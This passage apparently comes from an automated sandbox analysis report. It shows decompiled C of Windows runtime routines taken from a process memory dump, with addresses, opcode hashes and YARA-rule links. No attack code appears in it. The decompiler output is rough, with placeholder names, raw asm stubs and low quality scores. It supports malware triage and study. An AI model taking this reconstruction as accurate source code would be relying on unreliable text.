				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E049495D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E049495D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04909325();
					_t50 =  *0x49f84c4; // 0x0
					return E0495D0D1(L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                      0x04909240
                                                      0x04909242
                                                      0x04909247
                                                      0x0490924c
                                                      0x0490924e
                                                      0x04909255
                                                      0x04909257
                                                      0x0490925a
                                                      0x0490925f
                                                      0x0490925f
                                                      0x04909266
                                                      0x04909271
                                                      0x04909276
                                                      0x04909279
                                                      0x0490927e
                                                      0x04909295
                                                      0x0490929a
                                                      0x049092b1
                                                      0x049092b6
                                                      0x049092d7
                                                      0x049092dc
                                                      0x049092e0
                                                      0x049092e6
                                                      0x049092e8
                                                      0x049092ee
                                                      0x04909332
                                                      0x04909333
                                                      0x04909337
                                                      0x04909338
                                                      0x0490933a
                                                      0x0490933a
                                                      0x0490933d
                                                      0x04909342
                                                      0x04909342
                                                      0x04909345
                                                      0x04909349
                                                      0x0490934e
                                                      0x04909352
                                                      0x04909357
                                                      0x049092f4
                                                      0x049092f4
                                                      0x049092f6
                                                      0x049092f9
                                                      0x04909300
                                                      0x04909306
                                                      0x04909324
                                                      0x04909324

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cfe3cf9c47e725f9ec98728e83e5d0ad23dbdcfe89e06de69b87e2cba14ad340
                                                      • Instruction ID: a8c9fdf2c6f13940b7beb3503e8101b240ec1ee0c8ffb32f9f66658f874093b1
                                                      • Opcode Fuzzy Hash: cfe3cf9c47e725f9ec98728e83e5d0ad23dbdcfe89e06de69b87e2cba14ad340
                                                      • Instruction Fuzzy Hash: 95211671051600DFD765EF68CA40F5ABBB9EF98708F1489B8E049966A2CB34F941DB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493B390, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0493B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04922280(_t12, 0x49f8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E049400C2(0x49f8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                      0x0493b395
                                                      0x0493b3a2
                                                      0x0493b3a5
                                                      0x0493b3aa
                                                      0x0493b3b2
                                                      0x0493b3ba
                                                      0x0493b3bd
                                                      0x0493b3c0
                                                      0x0493b3c4
                                                      0x0493b3c9
                                                      0x0497a3e9
                                                      0x0497a3ed
                                                      0x0497a3f0
                                                      0x0497a3ff
                                                      0x0497a403
                                                      0x0497a409
                                                      0x00000000
                                                      0x00000000
                                                      0x0497a40b
                                                      0x0497a40b
                                                      0x0497a40f
                                                      0x0497a415
                                                      0x0497a423
                                                      0x0497a423
                                                      0x0497a415
                                                      0x0493b3d1
                                                      0x0493b3e8
                                                      0x0493b3e8
                                                      0x0493b3d9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc7107aa25b5cf0539dc070ff24f444d34c96b17a7028cfd422df7f916cc55bb
                                                      • Instruction ID: 7bd85512ed0bd36ca8c3e046ac3b3a866f010c968fb3e7d110396e09eeaaf22e
                                                      • Opcode Fuzzy Hash: cc7107aa25b5cf0539dc070ff24f444d34c96b17a7028cfd422df7f916cc55bb
                                                      • Instruction Fuzzy Hash: F01148373162209BDB18DE14CD81A2B729BEBC6730B24053DDA1697380DA31BC02C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04994257, Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E04994257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x49e08d0);
				E0495D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E049941E8(__ebx, __edi, __ecx, _t39);
				E0491EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x49f87e4;
					_t18 =  *0x49f87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x49f5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x49f87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x49f87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04907055(_t31 + 0xfffffff8);
								_t24 =  *0x49f87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x49f87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x49f5cd0;
				if( *0x49f5cd0 <= 0) {
					L04907055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x49f87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x49f87e8 = _t30;
						 *0x49f87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0495D0D1(L04994320());
			}















                                                      0x04994257
                                                      0x04994257
                                                      0x04994257
                                                      0x04994259
                                                      0x0499425e
                                                      0x04994263
                                                      0x04994265
                                                      0x04994273
                                                      0x04994278
                                                      0x0499427c
                                                      0x0499427f
                                                      0x04994281
                                                      0x04994287
                                                      0x049942d7
                                                      0x049942d7
                                                      0x049942da
                                                      0x0499428d
                                                      0x0499428d
                                                      0x0499428f
                                                      0x04994292
                                                      0x04994297
                                                      0x0499429c
                                                      0x049942a0
                                                      0x049942a6
                                                      0x049942a8
                                                      0x049942ae
                                                      0x049942b3
                                                      0x00000000
                                                      0x049942ba
                                                      0x049942ba
                                                      0x049942bf
                                                      0x049942c5
                                                      0x049942ca
                                                      0x049942cf
                                                      0x049942d0
                                                      0x00000000
                                                      0x049942d0
                                                      0x049942b3
                                                      0x00000000
                                                      0x049942a6
                                                      0x0499429c
                                                      0x049942dc
                                                      0x049942dc
                                                      0x049942e3
                                                      0x04994309
                                                      0x049942e5
                                                      0x049942e5
                                                      0x049942e8
                                                      0x049942ee
                                                      0x049942f0
                                                      0x00000000
                                                      0x049942f2
                                                      0x049942f2
                                                      0x049942f4
                                                      0x049942f7
                                                      0x049942f9
                                                      0x04994300
                                                      0x04994300
                                                      0x049942f0
                                                      0x0499430e
                                                      0x0499431f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4092f6cb7b95d141d132c24452bb6e7308a1a88ae2f7cf71c152d8c943604a1
                                                      • Instruction ID: 7b21b150e67b8ac92ab464f2fa7e509a72ae59014a82530ffd9b42729f0f205c
                                                      • Opcode Fuzzy Hash: c4092f6cb7b95d141d132c24452bb6e7308a1a88ae2f7cf71c152d8c943604a1
                                                      • Instruction Fuzzy Hash: 2D214D70609A01DFDF5AEF69D540A18BBF5FBC5328B2186BAC1158B690E735FC42CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049846A7, Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E049846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0494F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0493D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L049277F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                      0x049846b7
                                                      0x049846ba
                                                      0x049846c5
                                                      0x049846c8
                                                      0x049846d0
                                                      0x049846d4
                                                      0x049846e6
                                                      0x049846e9
                                                      0x049846f4
                                                      0x049846ff
                                                      0x04984705
                                                      0x04984706
                                                      0x0498470c
                                                      0x04984713
                                                      0x0498471b
                                                      0x04984723
                                                      0x04984725
                                                      0x049846d6
                                                      0x049846d9
                                                      0x049846db
                                                      0x049846db
                                                      0x04984732

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction ID: 0d096e98475a56fe29322fc63560ebd8858a3715fe78e54b9eb918458ba2b40e
                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction Fuzzy Hash: 0411C272504208BBD7059F5CD9808BEB7B9EFD5304F1080AEF94487350DA319D55D7A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04932397, Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 34%
                                                      			E04932397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x49f848c != 0) {
					L0492FAD0(0x49f8610);
					if( *0x49f848c == 0) {
						E0492FA00(0x49f8610, _t19, _t27, 0x49f8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04932581(0x49f8610, 0x48e50a0, _t26, _t27, _t28);
						E0492FA00(0x49f8610, 0x48e50a0, _t27, 0x49f8610);
					}
				} else {
					L1:
					_t11 =  *0x49f8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04944886(0x48e1088, 1, 0x49f8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04932581(0x49f8610, (_t11 << 4) + 0x48e5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                      0x049323b0
                                                      0x049323b6
                                                      0x04932409
                                                      0x04932415
                                                      0x04975ae9
                                                      0x00000000
                                                      0x0493241b
                                                      0x0493241b
                                                      0x0493241d
                                                      0x04932427
                                                      0x0493242e
                                                      0x04932430
                                                      0x04932430
                                                      0x049323b8
                                                      0x049323b8
                                                      0x049323b8
                                                      0x049323bf
                                                      0x049323fc
                                                      0x049323fc
                                                      0x049323c1
                                                      0x049323c3
                                                      0x049323d0
                                                      0x049323d8
                                                      0x049323d8
                                                      0x049323dc
                                                      0x049323de
                                                      0x049323e1
                                                      0x049323e1
                                                      0x049323ec

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3a92afe28ae434e90ba3922fb35bad118e862073f1e48d2e78889e950f51f49
                                                      • Instruction ID: 7d398569dbdb405ddcc484eecd863a2d38e46ce3becd7ec73e3c336a4c954253
                                                      • Opcode Fuzzy Hash: a3a92afe28ae434e90ba3922fb35bad118e862073f1e48d2e78889e950f51f49
                                                      • Instruction Fuzzy Hash: 9B11483230431067F320FB299C40B29B6DDEB91F65F044876F602A7240D674F8019755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490C962, Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 42%
                                                      			E0490C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x49fd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0491EEF0(0x49f70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0498F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0491EB70(_t29, 0x49f70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0494B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0498F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x49f70c0; // 0x0
					while(_t38 != 0x49f70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x49fb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                      0x0490c96a
                                                      0x0490c974
                                                      0x0490c988
                                                      0x0490c98a
                                                      0x04977c9d
                                                      0x04977c9f
                                                      0x04977ca4
                                                      0x04977cae
                                                      0x04977cf0
                                                      0x04977cf5
                                                      0x04977cfa
                                                      0x0490c992
                                                      0x0490c996
                                                      0x0490c997
                                                      0x0490c998
                                                      0x0490c9a3
                                                      0x0490c9a3
                                                      0x04977cb0
                                                      0x04977cb7
                                                      0x04977cbb
                                                      0x00000000
                                                      0x00000000
                                                      0x04977cbd
                                                      0x04977ce8
                                                      0x04977cc5
                                                      0x04977cc8
                                                      0x04977cca
                                                      0x04977cd0
                                                      0x04977cd6
                                                      0x04977cde
                                                      0x04977ce4
                                                      0x04977ce4
                                                      0x04977cd0
                                                      0x00000000
                                                      0x04977ce8
                                                      0x0490c990
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49ebf767213f04816d90cf76f92bb5e1bc884af8c0728832167d497c65115efe
                                                      • Instruction ID: 6c76a6a58deeb189b7fa04211bb66907456f2b06422152b1bef099cf81f5a872
                                                      • Opcode Fuzzy Hash: 49ebf767213f04816d90cf76f92bb5e1bc884af8c0728832167d497c65115efe
                                                      • Instruction Fuzzy Hash: 951182327046469BDB10AFA8DD85A2A7BE5FFC8614B080579ED4583650DB64FC10DBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049437F5, Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E049437F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04922280(_t6, 0x49f8550);
				}
				_t29 = E0494387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0491FFB0(0x49f8550, _t27, 0x49f8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                      0x049437fa
                                                      0x049437fc
                                                      0x04943805
                                                      0x04943808
                                                      0x04943808
                                                      0x04943814
                                                      0x04943818
                                                      0x04943846
                                                      0x04943848
                                                      0x0494384b
                                                      0x0494384b
                                                      0x04943852
                                                      0x00000000
                                                      0x04943854
                                                      0x04943856
                                                      0x00000000
                                                      0x00000000
                                                      0x04943863
                                                      0x00000000
                                                      0x04943863
                                                      0x0494381a
                                                      0x0494381a
                                                      0x0494381f
                                                      0x0494386e
                                                      0x0494386e
                                                      0x04943871
                                                      0x04943873
                                                      0x04943873
                                                      0x04943868
                                                      0x00000000
                                                      0x04943868
                                                      0x04943821
                                                      0x04943826
                                                      0x00000000
                                                      0x00000000
                                                      0x04943828
                                                      0x0494382a
                                                      0x04943841
                                                      0x00000000
                                                      0x04943841

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0e8ed17348caa92b8e85f4492f8da49cbc11c67370f53e1a968cb2acba6bbb7
                                                      • Instruction ID: d810995dc17cd217d34a6a4cb87110aa020dafb557d8a863a305c326dc5466b3
                                                      • Opcode Fuzzy Hash: f0e8ed17348caa92b8e85f4492f8da49cbc11c67370f53e1a968cb2acba6bbb7
                                                      • Instruction Fuzzy Hash: 9201C472B016109BD3378B69D940E2AFBAADFC5B7471584B9ED498B314D730F801C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493002D, Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0493002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04927D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04927D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04927D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04927D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                      0x04930032
                                                      0x04930037
                                                      0x04930043
                                                      0x04974b3a
                                                      0x04930049
                                                      0x04930049
                                                      0x04930049
                                                      0x0493004e
                                                      0x04930053
                                                      0x04974b48
                                                      0x04974b5a
                                                      0x04974b4a
                                                      0x04974b53
                                                      0x04974b53
                                                      0x04974b5f
                                                      0x00000000
                                                      0x04974b61
                                                      0x00000000
                                                      0x04974b61
                                                      0x04930059
                                                      0x04930059
                                                      0x04930060
                                                      0x04974b6f
                                                      0x04974b6f
                                                      0x04930069
                                                      0x04974b83
                                                      0x00000000
                                                      0x00000000
                                                      0x04974b90
                                                      0x04974b9b
                                                      0x04974b9b
                                                      0x04974ba4
                                                      0x00000000
                                                      0x00000000
                                                      0x04974baa
                                                      0x00000000
                                                      0x0493006f
                                                      0x0493006f
                                                      0x00000000
                                                      0x0493006f
                                                      0x04930069

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: 47a7871f58bc240a57cb667e36a90e8e56c8433cc7fc304b937822c94a3b04f4
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: BD11AD327056818FE7229B68CA44B3977E9EB82B59F0900F1DD049B697E728FC41C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491766D, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E0491766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0493F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0493F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04924620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                      0x04917672
                                                      0x0491767f
                                                      0x04917689
                                                      0x049176de
                                                      0x049176de
                                                      0x0491768b
                                                      0x04917691
                                                      0x04917693
                                                      0x04917697
                                                      0x00000000
                                                      0x04917699
                                                      0x049176a8
                                                      0x00000000
                                                      0x049176aa
                                                      0x049176ad
                                                      0x049176b1
                                                      0x00000000
                                                      0x049176b3
                                                      0x049176b3
                                                      0x049176b5
                                                      0x049176ba
                                                      0x049176bc
                                                      0x049176bc
                                                      0x049176c0
                                                      0x00000000
                                                      0x049176c2
                                                      0x049176ce
                                                      0x049176ce
                                                      0x049176c0
                                                      0x049176b1
                                                      0x049176a8
                                                      0x04917697
                                                      0x049176d9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction ID: f724e38996224ab41efecf21e2724e0231bc4b2147787517f6c2037d10453483
                                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction Fuzzy Hash: 9B01843270011EAFD720EE9ECD41E5B77ADFB897E0B240574B948CB268DA30ED0187A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04909080, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E04909080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x49f85ec;
				E04922280(_t48, 0x49f85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0491FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x49f538c; // 0x773b68c8
					if( *_t84 != 0x49f5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
